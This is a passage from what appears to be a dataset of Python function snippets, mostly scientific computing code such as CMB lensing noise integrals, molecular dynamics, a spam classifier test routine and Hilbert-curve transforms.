self.N_TT_EB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def N_TT_EE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_EE(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTE(l2)\n result += self.F_EE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTE(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TT_TE.__func__, \"integ\"):\n self.N_TT_TE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_TE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_TE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def calcualte_inte_vn(pT_low, pT_high, data):\n npT = 50\n pT_inte_array = linspace(pT_low, pT_high, npT)\n dpT = pT_inte_array[1] - pT_inte_array[0]\n dN_event = data[:, 2]\n pT_event = data[:, 0]\n dN_interp = exp(interp(pT_inte_array, pT_event, log(dN_event+1e-30)))\n N_event = data[:, -1]\n N_interp = exp(interp(pT_inte_array, pT_event, log(N_event+1e-30)))\n N = sum(N_interp)*dpT/0.1\n temp_vn_array = [N,]\n for iorder in range(1, n_order):\n vn_real_event = data[:, 4*iorder]\n vn_imag_event = data[:, 4*iorder+2]\n vn_real_interp = interp(pT_inte_array, pT_event, vn_real_event)\n vn_imag_interp = interp(pT_inte_array, pT_event, vn_imag_event)\n vn_real_inte = (\n sum(vn_real_interp*dN_interp*pT_inte_array)\n /sum(dN_interp*pT_inte_array))\n vn_imag_inte = (\n sum(vn_imag_interp*dN_interp*pT_inte_array)\n /sum(dN_interp*pT_inte_array))\n vn_inte = vn_real_inte + 1j*vn_imag_inte\n 
temp_vn_array.append(vn_inte)\n return(temp_vn_array)", "def system(p):\r\n\r\n C1, C2, C3, C4, C5, C6, C7, C8, \\\r\n C9,C10,C11,C12,C13,C14,C15,C16,C17,C18,C19,C20,C21,C22, \\\r\n C23, C24, C25, C26, C27, C28, C29, C30, C31, C32, C33, C34,\\\r\n C35, C36, C37, C38, C39, C40, C41, C42, C43, \\\r\n C44, C45, C46, C47, C48, C49, C50, C51, C52, C53, C54, C55, C56 = p\r\n\r\n C = [C1, C2, C3, C4, C5, C6, C7, C8,\r\n C9,C10,C11,C12,C13,C14,C15,C16,C17,C18,C19,C20,C21,C22,\r\n C23, C24, C25, C26, C27, C28, C29, C30, C31, C32, C33, C34, C35, C36, C37,\r\n C38, C39, C40, C41, C42, C43,\r\n C44, C45, C46, C47, C48, C49, C50, C51, C52, C53, C54, C55, C56]\r\n\r\n eqs = [C[i] * (Kd[i] + Rtot - sum(C)) + Etot[i] * (sum(C) - Rtot) for i in range(n)]\r\n\r\n return eqs", "def tpm3_1_8_start_genomic():\n return \"TPM3\", \"NC_000001.11\", 154191901, 154192135, -1", "def N_TE_TB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_TB(l1, l2, phi)*self.CMB.ftotalTT(l1)*self.CMB.ftotalEB(l2)\n result += 0. #self.F_TB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalTE(l2)\n result *= self.F_TE(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TE_TB.__func__, \"integ\"):\n self.N_TE_TB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TE_TB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TE_TB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def test_simple():\n B = 100\n H = 20\n E = 210000\n sections = ((B, H, 0, E),)\n EI, top, bot = bm.EI(sections, E)\n EIc = E * B * (H ** 3) / 12\n assert 0.99 < EI / EIc < 1.01\n assert top == H / 2\n assert bot == -H / 2", "def prove_CM() -> Proof:\n # Optional Task 6.7f", "def cal_et(self):\r\n\r\n for ind in range(2**(4*self.k)):\r\n i=0\r\n num = int(bin(ind)[2:])\r\n aux = listarNum(num)\r\n list_num=np.array([])\r\n while i < 4*self.k:\r\n if len(aux) < 4*self.k-i:\r\n list_num=np.append(list_num, [0.])\r\n elif len(aux)==4*self.k-i:\r\n list_num=np.append(list_num, aux)\r\n i=i+1\r\n \"\"\"\r\n reversed_list_num = list_num[::-1]\r\n self.et[ind]=reversed_list_num\r\n \"\"\"\r\n self.et[ind]=list_num", "def calibration(N,kb,T,Ekinv,V):\n lamb = np.sqrt((N-1)*3*kb*T/(Ekinv*2))\n \n if lamb < 0.9999:\n V = lamb*V\n elif lamb>1.0001:\n V = lamb*V\n \n return V", "def test_inu(self):\n lmax = 3\n x = np.array([5000])\n result_i, result_k = bessel_sk.lniknu(x, lmax)\n pih = np.log(0.5*np.pi)\n expP = (1+np.exp(-2*x))\n expM = (1-np.exp(-2*x))\n expected_i = np.array([\n -np.log(2*x**1) + x + np.log(expM),\n -np.log(2*x**2) + x + np.log(expM*(x+1)+x-1),\n -np.log(2*x**3) + x + np.log((3+x**2)*expM-3*x*expP),\n -np.log(2*x**4) + x + np.log((15*x+x**3)*expP-(15+6*x**2)*expM) \n ])\n expected_k = np.array([pih -x - 1*np.log(x),\n pih -x - 2*np.log(x) + np.log(x+1),\n pih -x - 3*np.log(x) + np.log(x**2+3*x+3),\n pih -x - 4*np.log(x) + np.log(x**3+6*x**2+15*x+15)\n ])\n assert_almost_equal(result_i[0]/expected_i.T, 1, decimal=4)\n assert_almost_equal(result_k[0]/expected_k.T, 1, decimal=4)", "def test_get_nveto_pmts(self):\n pass", "def gen_ep_data(self,ntrials,trlen):\n self.resort_emat()\n ## instruction\n # for each trial, 
generate random instruction encoding sequence\n i_encoding_input = np.array([\n np.random.permutation(np.arange(1,self.nmaps+1)) \n for i in range(ntrials)\n ])\n i_test_input = np.zeros([ntrials,trlen])\n i_input = np.concatenate([\n i_encoding_input,i_test_input],\n 1).astype(int).reshape(-1) # (ntrials,trlen+)\n ## stimulus\n x_encoding_input = i_encoding_input\n x_test_input = np.random.randint(1,self.nmaps+1,[ntrials,trlen])\n x_input = np.concatenate([x_encoding_input,x_test_input],1)\n # print('X',x_input)\n ''' \n embed x_input: \n [ntrials,nmaps+trlen] -> s_input [ntrials*(nmaps+trlen),edim]\n explicit loop required for flatten and embedd x_input\n because if switchmaps=1, matrix is resorted between trials\n and therefore same stimulus token integers correspond to\n different stimulus embeddings on different trials\n '''\n s_input = -np.ones([ntrials,(self.nmaps+trlen),self.stimdim])\n for trialn,x_input_trial in enumerate(x_input): \n if self.switchmaps: self.resort_emat()\n s_input[trialn] = self.emat[x_input_trial]\n # format output\n i_input = tr.unsqueeze(tr.LongTensor(i_input),1)\n s_input = tr.unsqueeze(tr.Tensor(np.concatenate(s_input)),1)\n yseq = tr.unsqueeze(tr.LongTensor(x_input.reshape(-1)),1)\n return i_input,s_input,yseq", "def e_step(self):\n # update VMF probabilities (Equation (3))\n logP = np.dot(self.features, self.mu.T)*self.kappa + np.log(self.pi).reshape(1,-1) # n by k\n logP_norm = logP - logsumexp(logP, axis=1).reshape(-1,1)\n self.p = np.exp(logP_norm)\n self.mllk = np.mean(logsumexp(logP, axis=1))", "def N_TE_EB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_EB(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEB(l2)\n result += 0. 
#self.F_EB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalEE(l2)\n result *= self.F_TE(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TE_EB.__func__, \"integ\"):\n self.N_TE_EB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TE_EB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TE_EB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def prove_N() -> Proof:\n # Optional Task 6.8", "def eulerphi(n):\r\n\treturn euler_phi(n)", "def TMM(x,N,n,trun_basis):\n Mat = np.zeros([len(trun_basis),len(trun_basis)])\n print('making TMM')\n perms = [int((x**n * iii)%N) for iii in trun_basis] # Modular multiplication\n for iii in range(len(trun_basis)):\n if trun_basis.__contains__(perms[iii]):\n Mat[iii,trun_basis.index(perms[iii])] = 1\n return Mat", "def gen_ep_data(self,ntrials,trlen):\n ## instruction\n # for each trial, generate random instruction encoding sequence\n i_encoding_input = np.array([\n np.random.permutation(np.arange(1,self.nmaps+1)) \n for i in range(ntrials)\n ])\n i_test_input = np.zeros([ntrials,trlen])\n i_input = np.concatenate([\n i_encoding_input,i_test_input],\n 1).astype(int).reshape(-1) # (ntrials,trlen+)\n ## stimulus\n x_encoding_input = i_encoding_input\n x_test_input = np.random.randint(1,self.nmaps+1,[ntrials,trlen])\n x_input = np.concatenate([i_encoding_input,x_test_input],1)\n ''' \n embed x_input: \n [ntrials,nmaps+trlen] -> s_input [ntrials*(nmaps+trlen),edim]\n explicit loop required for flatten and embedd x_input\n because if switchmaps=1, matrix is resorted between trials\n and therefore same stimulus token integers correspond to\n different stimulus embeddings on different trials\n '''\n s_input = -np.ones([ntrials,(self.nmaps+trlen),self.stimdim])\n for trialn,x_input_trial in enumerate(x_input): \n if self.switchmaps: self.resort_emat()\n s_input[trialn] = self.emat[x_input_trial]\n \n # format output\n i_input = tr.unsqueeze(tr.LongTensor(i_input),1)\n s_input = tr.unsqueeze(tr.Tensor(np.concatenate(s_input)),1)\n yseq = tr.unsqueeze(tr.LongTensor(x_input.reshape(-1)),1)\n if return_trial_flag:\n tr_flag = np.concatenate([i*np.ones(self.nmaps+trlen) for i in range(ntrials)])\n tr_flag = tr.unsqueeze(tr.LongTensor(tr_flag),1)\n return tr_flag,i_input,s_input,yseq,\n else:\n return i_input,s_input,yseq", "def getEG(n,int_method,func) :\n m = np.asarray([0.5,0.6,0.7,0.8,0.9,1,1.1,1.2,1.3,1.4,1.5,2,2.5,3,3.5,4,\n 4.5,5,5.5,6,6.5,7,7.5,8,8.5,9,9.5,10])\n bes = np.asarray([0.5,0.47768,0.44879,0.39831,0.25858,0,0.15502,0.25699,\n 0.30896,0.35245,0.39119,0.51822,0.53678,0.54984,0.55847,\n 0.56395,0.57054,0.57950,0.58402,0.58765,0.59512,0.60214,\n 0.60469,0.61143,0.61789,0.62443,0.63097,0.63694])\n p = np.asarray([1,0.85417,0.94685,1.04467,2.55052,0,1.59086,\n 1.00670,0.88866,0.83763,0.81030,0.76108,0.83093,0.86863,\n 0.89233,0.90909,0.92097,0.93007,0.93735,0.94332,0.94813,\n 0.95193,0.95557,0.95864,0.96107,0.96360,0.96570,\n 0.96788])\n h0 = np.asarray([0,-0.03567,-0.04808,-0.04315,-0.01879,0,0.00041,0.00069,\n 0.00639,0.01405,0.02294,0.07814,0.13994,0.19278,0.23793,\n 0.27678,0.31039,0.33974,0.36585,0.38917,0.41003,0.42891,\n 0.44621,0.46195,0.47644,0.48982,0.50223,0.51379])\n h1 = np.asarray([0,0.26899, 0.10571,0.01763,-0.39382,0,0.15211,0.05665,\n 0.00933,-0.02791,-0.05876,-0.16720,-0.13033,-0.10455 ,\n 
-0.08618,-0.07208,-0.06179,-0.05369,-0.04715,-0.04176,\n -0.03742,-0.03408,-0.03081,-0.02808,-0.02599,-0.02375,\n -0.02194,-0.02004])\n h2 = np.asarray([0,-0.09016,-0.06893,-0.04971,-0.08828,0,-0.03341,\n -0.03964,-0.04456,-0.04775,-0.04984,-0.05381,-0.03570,\n -0.02476,-0.01789,-0.01333,-0.01028,-0.00812,-0.00653,\n -0.00534,-0.00444,-0.00376,-0.00319,-0.00274,-0.00238,\n -0.00207,-0.00182,-0.00160])\n h3 = np.asarray([0,0.03993,0.03363,0.02216,-0.00797,0,0.00899,0.01172,\n 0.01150,0.01026,0.00860,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n 0])\n \n if (func == True) :\n int_bes = splev(n,splrep(m, bes))\n int_p = splev(n,splrep(m, p))\n int_h0 = splev(n,splrep(m, h0))\n int_h1 = splev(n,splrep(m, h1))\n int_h2 = splev(n,splrep(m, h2))\n int_h3 = splev(n,splrep(m, h3))\n else :\n int_bes = griddata(m, bes, n, method=int_method)\n int_p = griddata(m, p, n, method=int_method)\n int_h0 = griddata(m, h0, n, method=int_method)\n int_h1 = griddata(m, h1, n, method=int_method)\n int_h2 = griddata(m, h2, n, method=int_method)\n int_h3 = griddata(m, h3, n, method=int_method)\n \n return np.asarray([int_bes,int_p,int_h0,int_h1,int_h2,int_h3])", "def N_TE_EE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_EE(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEE(l2)\n result += self.F_EE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEE(l2)\n result *= self.F_TE(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TE_EE.__func__, \"integ\"):\n self.N_TE_EE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TE_EE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TE_EE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def ev2vi_nrl(eV,mu):\n return 9.79e3/np.sqrt(mu)*np.sqrt(2.*eV)", "def vinet(p, v):\n x = ( v / p[3] ) ** ( 1.0 / 3 )\n xi = 3.0 / 2 * ( p[2] - 1 )\n return p[0] + 9 * p[1] * p[3] / ( xi**2 ) * ( 1 + ( xi * ( 1 - x ) - 1 ) * np.exp( xi * ( 1 - x ) ) )", "def TR_algo8(self, h):\n ve = 0\n vd = self._vd\n k = 0\n p = [0,]*self._N\n m = max(self._compact_M)\n vM = sum(self._compact_M)\n for i in range(m-1, -1, -1):\n mu = self.extract_mask(i)\n mu_norm = sum([bit_component(mu, j) for j in range(self._N)])\n mu = rotate_right(mu, vd+1)\n pi = rotate_right(ve, vd+1) & (~mu & 2**self._N-1)\n r = [bit_component(h, vM - k - (j+1)) for j in range(mu_norm)][::-1]\n r = sum( [rx*2**j for j, rx in enumerate(r)] )\n k = k + mu_norm\n w = gcr_inv(r, mu, pi)\n l = gc(w)\n l = T_inv(ve, vd, l)\n for j in range(self._N):\n p[j] |= bit_component(l, j) << i\n ve = ve ^ (rotate_left(e(w), vd+1))\n vd = (vd + d(w) + 1) % self._N\n return p", "def simulating_verlet(n,N,D,t,Rv,sigma,epsilon,dt,m,T,dim,kb,V,steps_r):\n Ekinv = np.zeros((n,1))\n Epotv = np.zeros((n,1))\n Ev = np.zeros((n,1))\n Gpc = np.zeros((steps_r,n))\n for k in range(len(t)):\n F = particle_forceV(Rv[-1], N, sigma, epsilon, D)\n Rv.append(particle_positionV(copy.deepcopy(Rv[-1]), V, dt, F, D)) \n V = particle_velocityV(V, F, dt, Rv, sigma, epsilon, D, N)\n Ekinv[k] = np.sum(1/(2*m)*(V**2))\n \n #Calibration\n if (int(k%(10)) == int(0) & int(k)<int(len(t)/2)):\n V = calibration(N, kb,T,Ekinv[k],V)\n Ekinv[k] = 
np.sum(1/(2*m)*(V**2))\n if int(k)> int(len(t)-50):\n Gpc[:,k], dist, dr = pair_correlation(N,Rv[-1],D,steps_r)\n Uv = particle_LJV(Rv[-1], N, D) \n Epotv[k] = abs(Uv)/2 \n Ev[k] = Ekinv[k]+Epotv[k]\n return Rv, Ekinv, Epotv, Ev, Gpc", "def eulerphi(n):\n\treturn euler_phi(n)", "def test_post_nveto_pmts(self):\n pass", "def N_TT_TE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_TE(l1, l2, phi)*self.CMB.ftotalTT(l1)*self.CMB.ftotalTE(l2)\n result += self.F_TE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTT(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n\n # if first time, initialize integrator\n if not hasattr(self.N_TT_TE.__func__, \"integ\"):\n self.N_TT_TE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_TE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_TE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def Phi_nu_mu1(self, E_nu, N=1e24):\n #check this \n try:\n phi = [0.]*len(E_nu)\n\n Int = lambda x: self.crossSection(x) * self.protonFlux(x) * self.F_nu_mu_1(E_nu/x, x) / x\n\n for i, E_nu in enumerate(E_nu):\n logE_min = np.log10(E_nu)\n logE_max = 10\n\n Intervals = int(np.ceil(logE_max-logE_min))\n\n IntegrationBoundary = np.logspace(logE_min, logE_max, Intervals+1)\n #print IntegrationBoundary\n\n for j in range(Intervals):\n phi[i] += 1.6*N*quad(Int, IntegrationBoundary[j], IntegrationBoundary[j+1])[0]\n\n return np.array(phi)\n\n except TypeError as e:\n phi = 0.\n\n Int = lambda x: self.crossSection(x) * self.protonFlux(x) * self.F_nu_mu_1(E_nu/x, x) / x\n\n logE_min = np.log10(E_nu)\n logE_max = 10\n\n Intervals = int(np.ceil(logE_max-logE_min))\n IntegrationBoundary = np.logspace(logE_min, logE_max, Intervals+1)\n #print IntegrationBoundary\n for i in range(Intervals):\n phi += 1.6*N*quad(Int, IntegrationBoundary[i], IntegrationBoundary[i+1])[0]\n print (phi)\n\n return phi", "def testingPhase(SP, HP):\n classification= {}\n TP, TN, FP, FN = 0,0,0,0\n\n pullData = open(\"labels\", \"r\").read()\n dataArray= pullData.split('\\n')\n dataArrayTest=dataArray[21301:-1] #opens files from folder 070 onwards \n \n for eachLine in dataArrayTest:\n kind,file = eachLine.split(' ')\n print(file,kind)\n if (kind == \"spam\"):\n SO = 1 #initially stating that it is a spam not a ham\n HO = 0\n elif (kind== \"ham\"):\n HO = 1\n SO = 0\n file=file.strip('../') \n fileDir = os.path.dirname(os.path.realpath('__file__'))\n filepath = os.path.join(fileDir,file) \n email=\"\"\n fh = open(filepath, encoding=\"ascii\", errors=\"ignore\")\n for line in fh:\n email += line\n fh.close()\n email= email.lower()\n email_words = processText(contentEmail(email))\n email_words = tuple(email_words)\n spam_ba= math.log(PS,10) #initially contains value of Spam Probability\n ham_ba= math.log(PH, 10) #initially contains value of Ham Probability\n\n\n \"\"\"BAYES THEOREM\"\"\"\n for word, value in SP.items(): \n if word in email_words:\n x = math.log(value, 10)\n spam_ba += x\n else:\n x = math.log(1-value, 10)\n #print(x)\n spam_ba += x \n if ham_ba > spam_ba:\n label=\"ham\"\n elif ham_ba < spam_ba:\n label=\"spam\"\n\n for word,value in HP.items(): \n if word in email_words:\n x = 
math.log(value, 10)\n #print(x)\n ham_ba += x \n else:\n x = math.log(1-value, 10)\n #print(x)\n ham_ba += x \n if ham_ba > spam_ba:\n label=\"ham\"\n elif ham_ba < spam_ba:\n label=\"spam\"\n\n print(\"Spam Prob: \" ,spam_ba, \"Ham Prob: \" ,ham_ba)\n\n #This part determines if the emails are ham or spam depending on the calculations\n if HO == 1 and label == \"ham\":\n TN +=1\n if HO == 1 and label == \"spam\":\n FP +=1\n if SO == 1 and label == \"spam\":\n TP +=1\n if SO == 1 and label == \"ham\":\n FN +=1\n #print(classification)\n print(TP, TN, FP, FN)\n print(spam_ba)\n print(ham_ba)\n \"\"\"COMPUTES PRECISION AND RECALL\"\"\"\n Precision = TP/(TP+FP)\n Recall = TP/(TP+FN)\n\n print(\"Precision: \", Precision, \" \", \"Recall: \", Recall)", "def _inv_totient_estimate(m):\n primes = [ d + 1 for d in divisors(m) if isprime(d + 1) ]\n\n a, b = 1, 1\n\n for p in primes:\n a *= p\n b *= p - 1\n\n L = m\n U = int(math.ceil(m*(float(a)/b)))\n\n P = p = 2\n primes = []\n\n while P <= U:\n p = nextprime(p)\n primes.append(p)\n P *= p\n\n P //= p\n b = 1\n\n for p in primes[:-1]:\n b *= p - 1\n\n U = int(math.ceil(m*(float(P)/b)))\n\n return L, U", "def compute_thermo(E,dos,TT):\n if (len(dos)<3):\n print (\"Not enough points in the phonon DOS!\")\n return None\n \n ZPE = 0.5*dos_integral(E,dos,1)\n modes = dos_integral(E,dos)\n \n EvibT = np.zeros(len(TT))\n SvibT = np.zeros(len(TT))\n CvibT = np.zeros(len(TT))\n FvibT = np.zeros(len(TT))\n for i in range(0,len(TT)):\n h = 0.5*(E[2]-E[0])\n arg = K_BOLTZMANN_RY*TT[i]\n arg2 = 2.0 * arg\n Evib = 0.0\n Svib = 0.0\n Cvib = 0.0\n for j in range(0,len(dos)-3,3):\n\n Evib += 3.0*E[j]/tanh(E[j]/(arg2))*dos[j]+\\\n 3.0*E[j+1]/tanh(E[j+1]/(arg2))*dos[j+1]+\\\n 2.0*E[j+2]/tanh(E[j+2]/(arg2))*dos[j+2]\n \n Svib += 3.0*(E[j]/arg2/tanh(E[j]/arg2)-log(2.0*sinh(E[j]/arg2)))*dos[j]+\\\n 3.0*(E[j+1]/arg2/tanh(E[j+1]/arg2)-log(2.0*sinh(E[j+1]/arg2)))*dos[j+1]+\\\n 2.0*(E[j+2]/arg2/tanh(E[j+2]/arg2)-log(2.0*sinh(E[j+2]/arg2)))*dos[j+2]\n\n try: # avoid overflow error for arg very small\n Cvib += 3.0*pow(E[j]/arg,2)/( 4.0*pow(sinh(E[j]/(arg2)),2) )*dos[j]+\\\n 3.0*pow(E[j+1]/arg,2)/( 4.0*pow(sinh(E[j+1]/(arg2)),2) )*dos[j+1]+\\\n 2.0*pow(E[j+2]/arg,2)/( 4.0*pow(sinh(E[j+2]/(arg2)),2) )*dos[j+2]\n except:\n Cvib += 0.0\n\n EvibT[i] = h*0.5*Evib*3.0/8.0 # h is the integration step, 0.5 comes from the equation for E,\n # the factor 3.0/8.0 comes from the Simpson 3/8 rule\n SvibT[i] = h*K_BOLTZMANN_RY*Svib*3.0/8.0\n CvibT[i] = h*K_BOLTZMANN_RY*Cvib*3.0/8.0\n FvibT = EvibT - SvibT * TT\n\n print ()\n return TT, EvibT, SvibT, CvibT, FvibT, ZPE, modes", "def E_Dynamic_MavkoEtAl2009(rhob,DTS,PR):\n E = (2*(rhob*1000)*((304800/DTS)**2)*(1+PR))/1000000\n return E", "def createCNDTransEmiProb(self, qtc_type='qtcc'):\n \n if qtc_type == 'qtcb':\n state_num = 11\n elif qtc_type == 'qtcc':\n state_num = 83\n elif qtc_type == 'qtcbc':\n state_num = 92\n else:\n raise(QtcException(\"createCNDTransEmiProb: Unknow qtc type: {!r}\".format(qtc_type)))\n \n qtc = []\n \n if qtc_type == 'qtcb':\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n qtc.append([i-2, j-2])\n elif qtc_type == 'qtcc':\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n for k in xrange(1, 4):\n for l in xrange(1, 4):\n qtc.append([i-2, j-2, k-2, l-2])\n elif qtc_type == 'qtcbc':\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n qtc.append([i-2, j-2, np.NaN, np.NaN])\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n for k in xrange(1, 4):\n for l in xrange(1, 4):\n qtc.append([i-2, j-2, k-2, l-2])\n 
else:\n raise(QtcException(\"createCNDTransEmiProb: Unknow qtc type: {!r}\".format(qtc_type)))\n \n qtc = np.array(qtc)\n #np.savetxt('/home/cdondrup/qtc.csv', qtc, delimiter=',', fmt='%1f')\n \n trans = np.zeros((state_num, state_num))\n for i1 in xrange(qtc.shape[0]):\n for i2 in xrange(i1+1, qtc.shape[0]):\n trans[i1+1, i2+1] = np.nanmax(np.absolute(qtc[i1]-qtc[i2])) != 2\n if trans[i1+1, i2+1] == 1:\n for j1 in xrange(qtc.shape[1]-1):\n for j2 in xrange(j1+1, qtc.shape[1]):\n if sum(np.absolute(qtc[i1, [j1, j2]])) == 1 \\\n and sum(np.absolute(qtc[i2, [j1, j2]])) == 1:\n if np.nanmax(np.absolute(qtc[i1, [j1, j2]]-qtc[i2, [j1, j2]])) > 0 \\\n and sum(qtc[i1, [j1, j2]]-qtc[i2, [j1,j2]]) != 1:\n trans[i1+1, i2+1] = 5\n break\n if trans[i1+1, i2+1] != 1:\n break\n trans[i2+1, i1+1] = trans[i1+1, i2+1]\n \n trans[trans != 1] = 0\n #np.savetxt('/home/cdondrup/trans.csv', np.rint(trans).astype(int), delimiter=',', fmt='%i')\n trans[trans == 0] = 0.00001\n trans[0] = 1\n trans[:, 0] = 0\n trans[:, -1] = 1\n trans[0, -1] = 0\n trans[-1] = 0\n trans += np.dot(np.eye(state_num), 0.00001)\n trans[0, 0] = 0\n \n trans = trans / trans.sum(axis=1).reshape(-1, 1)\n #np.savetxt('/home/cdondrup/trans.csv', trans, delimiter=',')\n \n emi = np.eye(state_num)\n emi[emi == 0] = 0.0001\n \n return trans, emi", "def N_TT_TB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_TB(l1, l2, phi)*self.CMB.ftotalTT(l1)*self.CMB.ftotalTB(l2)\n result += 0. #self.F_TB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalTT(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TT_TB.__func__, \"integ\"):\n self.N_TT_TB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_TB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_TB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def test_uneven_sw():\n B = 100\n t = 1\n H = 30\n E = 20000\n sections = ((2 * B, t, 0, E), (B, t, H - t, E))\n EI, top, bot = bm.EI(sections, E)\n assert 1.95 < abs(bot) / top < 1.96", "def __init__(self):\n self.modulo = Bn.from_decimal(\n \"104274339861599109435228713715012587636997755949475388588516377743858594829526246207815488124753620113654378182611410869843692693515483841382145633329409600605358434237971173658402530546783352648106247803514459454270482848535758539851532076708790494943517894654046363923325714750480680188239471613308156143136830981518627799499285672172738874571644891075726999700275877298890101149587792836886648258733566308895110719770960720300899066897289080371563621668124216187770149740826973622700315037066876583866156345639276386510201006397141393775575135928749962477326783336184434815042335057049432193006499521591281357491659\")\n self.generator = FFElement(Bn.from_decimal(\n 
\"81099144573950922883933823309397903831307729923277144841334749422315595743437219371821139976270089085817737914449263008752457618988770955139245864971428025146021819160336876692205993068777078938240475549226164124952577975303221660397947822711916352061614341728562734417872584743294922245761212731150483802964283263230741041446988298186702952974697967148198190463075071628059974486966250538161512056563568090071474143434146441589514816635339916481756264419884177841781745530245175458079612447970067897693825433138760936325168807521204548329680909932742314536162869895548442852131478295912996232046258690790851591666552\"),\n self.modulo, self.order())", "def TR_algo7(self, p):\n h = 0\n ve = 0\n vd = self._vd\n m = max(self._compact_M)\n for i in range(m-1, -1, -1):\n mu = self.extract_mask(i)\n mu_norm = sum([bit_component(mu, j) for j in range(self._N)])\n mu = rotate_right(mu, vd+1)\n pi = rotate_right(ve, vd+1) & ((~mu) & 2**self._N-1)\n l = [bit_component(px, i) for px in p]\n # 2. construct a integer whose bits are given by l\n l = sum( [lx*2**j for j, lx in enumerate(l)] )\n l = T(ve, vd, l)\n w = inverse_gc(l)\n r = gcr(w, mu, pi)\n ve = ve ^ rotate_left(e(w), vd+1)\n vd = (vd + d(w) + 1) % self._N\n h = (h << mu_norm) | r\n return h", 